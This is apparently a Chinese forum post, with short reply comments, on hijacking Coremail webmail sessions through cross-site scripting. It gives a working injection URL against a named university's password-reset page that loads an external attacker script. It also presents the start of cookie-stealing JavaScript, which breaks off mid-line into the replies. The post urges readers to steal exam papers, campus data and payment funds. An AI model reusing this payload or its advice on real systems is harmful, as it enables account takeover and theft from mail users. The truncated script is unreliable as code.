用xss黑掉coremail的sid

admin

浏览器的bypass我就不说了 我的方法在IE8下无法实现的.
1、首先在http://mail.bnu.edu.cn/coremail/forgetpwd1.jsp?
uid=%22%3E%3Cscript%20src=http://files.cnblogs.com/xsser/coremail.js%3E%3C/script%3E
注入自己的代码。

2、比如

因为在coremail里 验证是靠sid来进行的。但是sid是写在链接里的 当然cookie里也有个叫coremail.sid。。。。呵呵呵
其实coremail作为各大高校常用的mail系统。其csrf也是比较都的，搞定mail就可以搞定试卷…全校数据信息…各种*&……#@！ 你懂的！要是能刷个支付宝啥的 钱虽然比较少，但是全部搞起来的话也够你大学4年白吃白喝了，不过这个是非法的事情，注意刑法的修改条例了。
然后加载的js为：
var my_post = "";
var b,c,d,mail_cookies;
var xhr;
document.write("

nike1412

好帖，有才  

玄冰

我帮你 喝喝  

我爱你曹妮梅

这个贴不错！！！！！  

xi2456166460

鉴定完毕.!  

巅峰灬少杰

发贴看看自己积分  

小四

顶一个先  

星辰剑圣

(*^__^*) 嘻嘻……   

富二逼

(*^__^*) 嘻嘻……